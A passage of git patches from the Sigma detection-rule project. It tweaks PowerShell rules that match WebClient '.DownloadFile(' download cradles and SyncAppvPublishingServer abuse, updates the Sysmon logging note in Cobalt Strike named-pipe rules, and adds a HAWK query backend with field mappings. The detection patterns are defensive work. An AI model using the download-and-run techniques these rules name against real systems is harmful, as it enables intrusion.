.../powershell_syncappvpublishingserver_exe_in_contextinfo.yml | 3 +-- .../powershell_suspicious_download_in_scriptblocktext.yml | 3 +-- ...ershell_syncappvpublishingserver_exe_in_scriptblocktext.yml | 3 +-- 4 files changed, 4 insertions(+), 8 deletions(-) diff --git a/rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml b/rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml index 1cd4d88a..09770894 100644 --- a/rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml +++ b/rules/windows/powershell/powershell_module/powershell_suspicious_download_in_contextinfo.yml @@ -17,8 +17,7 @@ logsource: category: ps_module detection: webclient: - ContextInfo|contains: - - 'System.Net.WebClient' + ContextInfo|contains: 'System.Net.WebClient' download: ContextInfo|contains: - '.DownloadFile(' diff --git a/rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml b/rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml index c3baddcf..50adcdf3 100644 --- a/rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml +++ b/rules/windows/powershell/powershell_module/powershell_syncappvpublishingserver_exe_in_contextinfo.yml @@ -19,8 +19,7 @@ logsource: category: ps_module detection: selection: - ContextInfo|contains: - - 'SyncAppvPublishingServer.exe' + ContextInfo|contains: 'SyncAppvPublishingServer.exe' condition: selection falsepositives: - App-V clients diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml index f31303da..b33c4bea 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_download_in_scriptblocktext.yml @@ -17,8 +17,7 @@ logsource: category: ps_script detection: webclient: - ScriptBlockText|contains: - - 'System.Net.WebClient' + ScriptBlockText|contains: 'System.Net.WebClient' download: ScriptBlockText|contains: - '.DownloadFile(' diff --git a/rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml b/rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml index 30e37a01..7dfbaa60 100644 --- a/rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml +++ b/rules/windows/powershell/powershell_script/powershell_syncappvpublishingserver_exe_in_scriptblocktext.yml @@ -19,8 +19,7 @@ logsource: category: ps_script detection: selection: - ScriptBlockText|contains: - - 'SyncAppvPublishingServer.exe' + ScriptBlockText|contains: 'SyncAppvPublishingServer.exe' condition: selection falsepositives: - App-V clients From 6c86500414d6f6ed61dd12bdb8111270d686da4e Mon Sep 17 00:00:00 2001 From: WojciechLesicki Date: Mon, 18 Oct 2021 21:34:05 +0200 Subject: [PATCH 1266/1367] Description changes acording to https://github.com/SwiftOnSecurity/sysmon-config/pull/151 --- rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml | 2 +- rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml | 2 +- .../pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml | 2 +- .../windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml index 89612067..80ada94e 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml @@ -16,7 +16,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' detection: selection_MSSE: PipeName|contains|all: diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index cc18f34d..affe16b4 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -15,7 +15,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' detection: selection: - PipeName|re: '\\\\mojo\.5688\.8052\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml index 52c6de08..79ea5a81 100644 --- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml @@ -15,7 +15,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' detection: selection_malleable_profiles: - PipeName|startswith: diff --git a/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml index 44954d47..dfb28c36 100644 --- a/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml +++ b/rules/windows/pipe_created/sysmon_susp_wmi_consumer_namedpipe.yml @@ -9,7 +9,7 @@ author: Florian Roth logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular' detection: selection: Image|endswith: '\scrcons.exe' From b30abd5c1226d452bb96acaa0f8e645f097fa4f7 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Mon, 18 Oct 2021 21:34:48 +0000 Subject: [PATCH 1267/1367] updating hawk json format record --- tools/sigma/backends/hawk.py | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 9d0e0611..17dbc6a1 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -402,7 +402,9 @@ class HAWKBackend(SingleTextQueryBackend): raise Exception("Unknown type for false positives: ", type(sigmaparser.parsedyaml['falsepositives'])) if 'references' in sigmaparser.parsedyaml: - cmt += "References: \n%s" % "\n".join(sigmaparser.parsedyaml['references']) + ref = "%s\n" % "\n".join(sigmaparser.parsedyaml['references']) + else: + ref = '' record = { "rules" : analytic, # analytic_txt.replace('"','""'), "filter_name" : sigmaparser.parsedyaml['title'], @@ -412,8 +414,9 @@ class HAWKBackend(SingleTextQueryBackend): "enabled" : True, "public" : True, "comments" : cmt, + "references" : ref, "group_name" : ".", - "score_id" : sigmaparser.parsedyaml['id'] + "hawk_id" : sigmaparser.parsedyaml['id'] } if 'tags' in sigmaparser.parsedyaml: record["tags"] = sigmaparser.parsedyaml['tags'] From ae2923bdd8c3fadbc0b4d93ddd7c2c346b994d4e Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Wed, 13 Oct 2021 14:36:49 +0000 Subject: [PATCH 1268/1367] Initial commmit of hawk analytic score generator --- tools/config/hawk.yml | 99 +++++++++ tools/sigma/backends/hawk.py | 415 +++++++++++++++++++++++++++++++++++ 2 files changed, 514 insertions(+) create mode 100644 tools/config/hawk.yml create mode 100644 tools/sigma/backends/hawk.py diff --git a/tools/config/hawk.yml b/tools/config/hawk.yml new file mode 100644 index 00000000..5caf6ede --- /dev/null +++ b/tools/config/hawk.yml @@ -0,0 +1,99 @@ +title: HAWK +order: 20 +backends: + - hawk +fieldmappings: + dst: + - ip_dst_host + dst_ip: + - ip_dst + src: + - ip_src_host + src_ip: + - ip_src + category: vendor_category + error: error_code + key: event_key + payload: event_payload + weight: event_weight + account type: account_type + PrivilegeList: process_privileges + pid_user: event_username + sid: correlation_session_id + UserSid: correlation_session_id + TargetSid: target_session_id + TargetUserName: target_username + SamAccountName: target_username + AccountName: target_username + TargetDomainName: target_domain + DnsServerIpAddress: dns_address + QueryName: hostname_dst + AuthenticationPackageName: package_name + HostProcess: image + Application: image + ProcessName: image + TargetImage: target_image + Parent Image: parent_image + ParentImage: parent_image + Caller Process Name: parent_image + CallerProcessName: parent_image + ParentProcessName: parent_image + CommandLine: command + ProcessCommandLine: command + ParentCommandLine: parent_command + IMPHASH: file_hash_imphash + SHA256: file_hash_sha256 + MD5: file_hash_md5 + SHA1: file_hash_sha1 + SubjectUserSid: correlation_session_id + SubjectSid: correlation_session_id + SubjectUserName: correlation_username + SubjectDomainName: correlation_domain + SubjectLogonId: correlation_logon_id + pid: event_pid + ProccessId: pid + NewProcessName: image + ServiceName: service_name + Service: service_name + ServiceFileName: filename + TargetObject: target_object + EventID: vendor_id + SourceImage: parent_image + Description: image_description + Product: image_product + Company: image_company + CurrentDirectory: path + ShareName: path + RelativeTargetName: filename + TargetName: value + Initiated: value + Accesses: access_mask + LDAPDisplayName: distinguished_name + AttributeLDAPDisplayName: distinguished_name + AttributeValue: value + ParentProcessId: parent_pid + SourceProcessId: source_pid + TargetProcessId: target_pid + Signed: signature + Status: value + TargetFilename: filename + TargetObject: object + ObjectClass: object_type + ObjectValueName: object_name + DeviceClassName: object_name + Details: object_target + CallTrace: calltrace + IpAddress: ip_src + DCIPAddress: ip_src + WorkstationName: hostname_src + Workstation: hostname_src + DestinationIp: ip_dst + DestinationHostname: hostname_dst + DestinationPort: ip_dport + GrantedAccess: access_mask + StartModule: target_process_name + TargetProcessAddress: process_address + TicketOptions: sys.ticket.options + TicketEncryptionType: sys.ticket.encryption.type + DetectionSource: value + Priority: event_priority diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py new file mode 100644 index 00000000..b2a775be --- /dev/null +++ b/tools/sigma/backends/hawk.py @@ -0,0 +1,415 @@ +# Output backends for sigmac - HAWK.io + + +import re +import sigma +import json +import uuid +from sigma.parser.modifiers.base import SigmaTypeModifier +from sigma.parser.modifiers.type import SigmaRegularExpressionModifier +from .base import SingleTextQueryBackend +from .mixins import MultiRuleOutputMixin + + +class HAWKBackend(SingleTextQueryBackend): + """Converts Sigma rule into HAWK search""" + identifier = "hawk" + active = True + config_required = False + default_config = ["sysmon", "hawk"] + reEscape = re.compile('(")') + reClear = None + andToken = " , " + orToken = " , " + subExpression = "{\"id\": \"and\", \"key\": \"And\", \"children\": [%s] }" + listExpression = "%s" + listSeparator = " " + valueExpression = "%s" + keyExpression = "%s" + nullExpression = "%s = null" + notNullExpression = "%s != null" + mapExpression = "%s=%s" + mapListsSpecialHandling = True + aql_database = "events" + + def cleanKey(self, key): + if key == None: + return "" + return self.sigmaparser.config.get_fieldmapping(key).resolve_fieldname(key, self.sigmaparser) + + def cleanValue(self, value): + """Remove quotes in text""" + # return value.replace("\'","\\\'") + return value + + def generateNode(self, node, notNode=False): + #print(type(node)) + #print(node) + if type(node) == sigma.parser.condition.ConditionAND: + return self.generateANDNode(node) + elif type(node) == sigma.parser.condition.ConditionOR: + #print("OR NODE") + #print(node) + return self.generateORNode(node) + elif type(node) == sigma.parser.condition.ConditionNOT: + #print("NOT NODE") + #print(node) + return self.generateNOTNode(node) + elif type(node) == sigma.parser.condition.ConditionNULLValue: + return self.generateNULLValueNode(node) + elif type(node) == sigma.parser.condition.ConditionNotNULLValue: + return self.generateNotNULLValueNode(node) + elif type(node) == sigma.parser.condition.NodeSubexpression: + #print(node) + return self.generateSubexpressionNode(node) + elif type(node) == tuple: + return self.generateMapItemNode(node, notNode) + elif type(node) in (str, int): + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "regex" }, "str": { "value": "5" } } } + #key = next(iter(self.sigmaparser.parsedyaml['detection'])) + key = "payload" + + #nodeRet['key'] = self.cleanKey(key).lower() + nodeRet['key'] = key + + #print(node) + #print("KEY: ", key) + # they imply the entire payload + nodeRet['description'] = key + nodeRet['rule_id'] = str(uuid.uuid4()) + nodeRet['args']['str']['value'] = self.generateValueNode(node, False) + # return json.dumps(nodeRet) + return nodeRet + elif type(node) == list: + return self.generateListNode(node, notNode) + else: + raise TypeError("Node type %s was not expected in Sigma parse tree" % (str(type(node)))) + + def generateANDNode(self, node): + """ + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + if self.sort_condition_lists: + filtered = sorted(filtered) + return self.andToken.join(filtered) + else: + return None + """ + ret = { "id" : "and", "key": "And", "children" : [ ] } + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + if self.sort_condition_lists: + filtered = sorted(filtered) + ret['children'] = filtered + # return json.dumps(ret)# self.orToken.join(filtered) + return ret + else: + return None + + def generateORNode(self, node): + ret = { "id" : "or", "key": "Or", "children" : [ ] } + generated = [ self.generateNode(val) for val in node ] + filtered = [ g for g in generated if g is not None ] + if filtered: + if self.sort_condition_lists: + filtered = sorted(filtered) + ret['children'] = filtered + # return json.dumps(ret)# self.orToken.join(filtered) + return ret + else: + return None + + def generateSubexpressionNode(self, node): + generated = self.generateNode(node.items) + if 'len'in dir(node.items): # fix the "TypeError: object of type 'NodeSubexpression' has no len()" + if len(node.items) == 1: + # A sub expression with length 1 is not a proper sub expression, no self.subExpression required + return generated + if generated: + return json.loads(self.subExpression % json.dumps(generated)) + else: + return None + + def generateListNode(self, node, notNode=False): + if not set([type(value) for value in node]).issubset({str, int}): + raise TypeError("List values must be strings or numbers") + result = [self.generateNode(value, notNode) for value in node] + if len(result) == 1: + # A list with length 1 is not a proper list, no self.listExpression required + return result[0] + #print("LIST EXPRESSION") + #print(result) + return self.listExpression % (self.listSeparator.join(result)) + + def generateNOTNode(self, node): + generated = self.generateNode(node.item, True) + return generated + + def generateMapItemNode(self, node, notNode=False): + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": 5 } } } + if notNode: + nodeRet["args"]["comparison"]["value"] = "!=" + nodeRet['rule_id'] = str(uuid.uuid4()) + key, value = node + if self.mapListsSpecialHandling == False and type(value) in (str, int, list) or self.mapListsSpecialHandling == True and type(value) in (str, int): + nodeRet['key'] = self.cleanKey(key).lower() + nodeRet['description'] = key + if type(value) == str and "*" in value: + # value = value.replace("*", ".*") + value = value.replace("*", "") + if notNode: + nodeRet["args"]["comparison"]["value"] = "!regex" + else: + nodeRet['args']['comparison']['value'] = "regex" + nodeRet['args']['str']['value'] = value + # return "%s regex %s" % (self.cleanKey(key), self.generateValueNode(value, True)) + #return json.dumps(nodeRet) + return nodeRet + elif type(value) is str: + #return self.mapExpression % (self.cleanKey(key), self.generateValueNode(value, True)) + nodeRet['args']['str']['value'] = value + # return json.dumps(nodeRet) + return nodeRet + elif type(value) is int: + nodeRet['return'] = "int" + nodeRet['args']['int'] = { "value" : value } + del nodeRet['args']['str'] + #return self.mapExpression % (self.cleanKey(key), self.generateValueNode(value, True)) + #return json.dumps(nodeRet) + return nodeRet + else: + #return self.mapExpression % (self.cleanKey(key), self.generateNode(value)) + nodeRet['args']['str']['value'] = value + #return json.dumps(nodeRet) + return nodeRet + elif type(value) == list: + return self.generateMapItemListNode(key, value, notNode) + elif isinstance(value, SigmaTypeModifier): + return self.generateMapItemTypedNode(key, value) + elif value is None: + #return self.nullExpression % (key, ) + nodeRet['args']['str']['value'] = None + #return json.dumps(nodeRet) + return nodeRet + else: + raise TypeError("Backend does not support map values of type " + str(type(value))) + + def generateMapItemListNode(self, key, value, notNode=False): + ret = { "id" : "or", "key": "Or", "children" : [ ] } + for item in value: + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": "5" } } } + nodeRet['key'] = self.cleanKey(key).lower() + nodeRet['description'] = key + nodeRet['rule_id'] = str(uuid.uuid4()) + if item is None: + nodeRet['args']['str']['value'] = 'null' + ret['children'].append( nodeRet ) + elif type(item) == str and "*" in item: + item = item.replace("*", "") + # item = item.replace("*", ".*") + #print("item") + #print(item) + nodeRet['args']['str']['value'] = item # self.generateValueNode(item, True) + if notNode: + nodeRet["args"]["comparison"]["value"] = "!regex" + else: + nodeRet['args']['comparison']['value'] = "regex" + ret['children'].append( nodeRet ) + else: + #print("item2") + #print(item) + nodeRet['args']['str']['value'] = self.generateValueNode(item, True) + ret['children'].append( nodeRet ) + # return json.dumps(ret) # '('+" or ".join(itemslist)+')' + return ret # '('+" or ".join(itemslist)+')' + + def generateMapItemTypedNode(self, fieldname, value, notNode=False): + nodeRet = {"key": "", "description": "", "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": "5" } } } + nodeRet['key'] = self.cleanKey(fieldname).lower() + nodeRet['description'] = fieldname + nodeRet['rule_id'] = str(uuid.uuid4()) + if type(value) == SigmaRegularExpressionModifier: + regex = str(value) + """ + # Regular Expressions have to match the full value in QRadar + if not (regex.startswith('^') or regex.startswith('.*')): + regex = '.*' + regex + if not (regex.endswith('$') or regex.endswith('.*')): + regex = regex + '.*' + return "%s imatches %s" % (self.cleanKey(fieldname), self.generateValueNode(regex, True)) + """ + #print("ENDS WITH!!!") + nodeRet['args']['str']['value'] = self.generateValueNode(regex, True) + if notNode: + nodeRet["args"]["comparison"]["value"] = "!regex" + else: + nodeRet['args']['comparison']['value'] = "regex" + # return json.dumps(nodeRet) + return nodeRet + else: + raise NotImplementedError("Type modifier '{}' is not supported by backend".format(value.identifier)) + + def generateValueNode(self, node, keypresent): + """ + if keypresent == False: + return "payload regex \'{0}{1}{2}\'".format("%", self.cleanValue(str(node)), "%") + else: + return self.valueExpression % (self.cleanValue(str(node))) + """ + return self.valueExpression % (self.cleanValue(str(node))) + + def generateNULLValueNode(self, node): + # node.item + nodeRet = {"key": node.item, "description": node.item, "class": "column", "return": "str", "args": { "comparison": { "value": "=" }, "str": { "value": "null" } } } + nodeRet['rule_id'] = str(uuid.uuid4()) + # return json.dumps(nodeRet) + return nodeRet + + def generateNotNULLValueNode(self, node): + # return self.notNullExpression % (node.item) + return node.item + + def generateAggregation(self, agg, timeframe='00'): + if agg == None: + return "" + if agg.aggfunc == sigma.parser.condition.SigmaAggregationParser.AGGFUNC_NEAR: + raise NotImplementedError("The 'near' aggregation operator is not yet implemented for this backend") + if agg.groupfield == None: + s = "SELECT %s(%s) as agg_val from %s where" % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + s2 = " group by %s having agg_val %s %s" % (self.cleanKey(agg.aggfield), agg.cond_op, agg.condition) + raise NotImplementedError("The 'agg val' aggregation operator is not yet implemented for this backend: %s %s" % (s, s2)) + """ + elif agg.groupfield != None and timeframe == '00': + self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + self.suffixAgg = " group by %s having agg_val %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition) + return self.prefixAgg, self.suffixAgg + elif agg.groupfield != None and timeframe != None: + for key, duration in self.generateTimeframe(timeframe).items(): + self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + self.suffixAgg = " group by %s having agg_val %s %s LAST %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition, duration, key) + return self.prefixAgg, self.suffixAgg + else: + self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + self.suffixAgg = " group by %s having agg_val %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition) + return self.prefixAgg, self.suffixAgg + """ + #print(agg) + raise NotImplementedError("The 'agg' aggregation operator is not yet implemented for this backend") + + def generateTimeframe(self, timeframe): + time_unit = timeframe[-1:] + duration = timeframe[:-1] + timeframe_object = {} + if time_unit == "s": + timeframe_object['seconds'] = int(duration) + elif time_unit == "m": + timeframe_object['minutes'] = int(duration) + elif time_unit == "h": + timeframe_object['hours'] = int(duration) + elif time_unit == "d": + timeframe_object['days'] = int(duration) + else: + timeframe_object['months'] = int(duration) + return timeframe_object + + def generate(self, sigmaparser): + """Method is called for each sigma rule and receives the parsed rule (SigmaParser)""" + #print(sigmaparser.parsedyaml) + #print(sigmaparser.condparsed) + for parsed in sigmaparser.condparsed: + query = self.generateQuery(parsed, sigmaparser) + before = self.generateBefore(parsed) + after = self.generateAfter(parsed) + + result = "" + if before is not None: + result = before + if query is not None: + result += query + if after is not None: + result += after + + return result + + def generateQuery(self, parsed, sigmaparser): + self.sigmaparser = sigmaparser + result = self.generateNode(parsed.parsedSearch) + self.parsedlogsource = sigmaparser.get_logsource().index + """ + if any("flow" in i for i in self.parsedlogsource): + aql_database = "flows" + else: + aql_database = "events" + """ + prefix = "" + ret = '[ { "id" : "and", "key": "And", "children" : [' + ret2 =" ] } ]" + """ + try: + mappedFields = [] + for field in sigmaparser.parsedyaml["fields"]: + mapped = sigmaparser.config.get_fieldmapping(field).resolve_fieldname(field, sigmaparser) + mappedFields.append(mapped) + if " " in mapped and not "(" in mapped: + prefix += ", \"" + mapped + "\"" + else: + prefix += ", " + mapped + + except KeyError: # no 'fields' attribute + mapped = None + pass + """ + + #if parsed.parsedAgg: #and timeframe == None: + # (prefix, suffixAgg) = self.generateAggregation(parsed.parsedAgg) + # result = prefix + result + # result += suffixAgg + #elif parsed.parsedAgg != None and timeframe != None: + # (prefix, suffixAgg) = self.generateAggregation(parsed.parsedAgg, timeframe) + # result = prefix + result + # result += suffixAgg + #else: + # result = prefix + result + + #print(result) + result = prefix + json.dumps(result) + + # print(sigmaparser.parsedyaml) + + analytic_txt = ret + result + ret2 # json.dumps(ret) + try: + analytic = json.loads(analytic_txt) # json.dumps(ret) + except Exception as e: + print("Failed to parse json: %s" % analytic_txt) + raise Exception("Failed to parse json: %s" % analytic_txt) + # "rules","filter_name","actions_category_name","correlation_action","date_added","scores/53c9a74abfc386415a8b463e","enabled","public","group_name","score_id" + + record = { + "rules" : analytic, # analytic_txt.replace('"','""'), + "filter_name" : sigmaparser.parsedyaml['title'], + "actions_category_name" : "Add (+)", + "correlation_action" : 5.00, + "date_added" : sigmaparser.parsedyaml['date'], + "enabled" : True, + "public" : True, + "group_name" : ".", + "score_id" : sigmaparser.parsedyaml['id'] + } + if not 'status' in self.sigmaparser.parsedyaml or 'status' in self.sigmaparser.parsedyaml and self.sigmaparser.parsedyaml['status'] != 'experimental': + record['correlation_action'] += 10.0; + if 'falsepositives' in self.sigmaparser.parsedyaml and len(self.sigmaparser.parsedyaml['falsepositives']) > 1: + record['correlation_action'] -= (2.0 * len(self.sigmaparser.parsedyaml['falsepositives']) ) + + if 'level' in self.sigmaparser.parsedyaml: + if self.sigmaparser.parsedyaml['level'].lower() == 'critical': + record['correlation_action'] += 15.0; + elif self.sigmaparser.parsedyaml['level'].lower() == 'high': + record['correlation_action'] += 10.0; + elif self.sigmaparser.parsedyaml['level'].lower() == 'medium': + record['correlation_action'] += 5.0; + elif self.sigmaparser.parsedyaml['level'].lower() == 'low': + record['correlation_action'] += 2.0; + + return json.dumps(record) From f2d9cf0964dbdfba46c2cb1ff0ced73a53a57ff0 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Thu, 14 Oct 2021 14:17:03 +0000 Subject: [PATCH 1269/1367] Initial commmit of hawk analytic score generator --- tools/sigma/backends/hawk.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index b2a775be..0bfe6192 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -376,7 +376,7 @@ class HAWKBackend(SingleTextQueryBackend): #print(result) result = prefix + json.dumps(result) - # print(sigmaparser.parsedyaml) + print(sigmaparser.parsedyaml) analytic_txt = ret + result + ret2 # json.dumps(ret) try: From 6e35c031de2fb107b13dc65022c4f52e24e8b94c Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Thu, 14 Oct 2021 15:05:05 +0000 Subject: [PATCH 1270/1367] Add additional information to the analytic record, including tags, author info, rule id and references --- tools/sigma/backends/hawk.py | 23 ++++++++++++++++++++++- tools/sigma/sigmac.py | 3 ++- 2 files changed, 24 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 0bfe6192..9d0e0611 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -376,7 +376,7 @@ class HAWKBackend(SingleTextQueryBackend): #print(result) result = prefix + json.dumps(result) - print(sigmaparser.parsedyaml) + #print(sigmaparser.parsedyaml) analytic_txt = ret + result + ret2 # json.dumps(ret) try: @@ -386,6 +386,23 @@ class HAWKBackend(SingleTextQueryBackend): raise Exception("Failed to parse json: %s" % analytic_txt) # "rules","filter_name","actions_category_name","correlation_action","date_added","scores/53c9a74abfc386415a8b463e","enabled","public","group_name","score_id" + cmt = "Sigma Rule: %s\n" % sigmaparser.parsedyaml['id'] + cmt += "Author: %s\n" % sigmaparser.parsedyaml['author'] + cmt += "Level: %s\n" % sigmaparser.parsedyaml['level'] + if 'falsepositives' in sigmaparser.parsedyaml and type(sigmaparser.parsedyaml['falsepositives']) is list: + if len(sigmaparser.parsedyaml['falsepositives']) > 0: + cmt += "False Positives: " + for v in sigmaparser.parsedyaml['falsepositives']: + if v: + cmt += "%s, " % v + else: + cmt += "None, " + cmt = cmt[:-2] + "\n" + elif 'falsepositives' in sigmaparser.parsedyaml and sigmaparser.parsedyaml['falsepositives']: + raise Exception("Unknown type for false positives: ", type(sigmaparser.parsedyaml['falsepositives'])) + + if 'references' in sigmaparser.parsedyaml: + cmt += "References: \n%s" % "\n".join(sigmaparser.parsedyaml['references']) record = { "rules" : analytic, # analytic_txt.replace('"','""'), "filter_name" : sigmaparser.parsedyaml['title'], @@ -394,9 +411,13 @@ class HAWKBackend(SingleTextQueryBackend): "date_added" : sigmaparser.parsedyaml['date'], "enabled" : True, "public" : True, + "comments" : cmt, "group_name" : ".", "score_id" : sigmaparser.parsedyaml['id'] } + if 'tags' in sigmaparser.parsedyaml: + record["tags"] = sigmaparser.parsedyaml['tags'] + if not 'status' in self.sigmaparser.parsedyaml or 'status' in self.sigmaparser.parsedyaml and self.sigmaparser.parsedyaml['status'] != 'experimental': record['correlation_action'] += 10.0; if 'falsepositives' in self.sigmaparser.parsedyaml and len(self.sigmaparser.parsedyaml['falsepositives']) > 1: diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 27f07a0c..6a153a6f 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -22,7 +22,7 @@ import ruamel.yaml import json import pathlib import itertools -import logging +import logging, traceback from sigma.parser.collection import SigmaCollectionParser from sigma.parser.exceptions import SigmaCollectionParseError, SigmaParseError from sigma.configuration import SigmaConfiguration, SigmaConfigurationChain @@ -368,6 +368,7 @@ def main(): sys.exit(error) except (NotImplementedError, TypeError) as e: print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) + traceback.print_exc() logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) success = False if not cmdargs.ignore_backend_errors: From 16a78187bd67cefb76a9fc195210d2df26c0c959 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Mon, 18 Oct 2021 21:34:48 +0000 Subject: [PATCH 1271/1367] updating hawk json format record --- tools/sigma/backends/hawk.py | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 9d0e0611..17dbc6a1 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -402,7 +402,9 @@ class HAWKBackend(SingleTextQueryBackend): 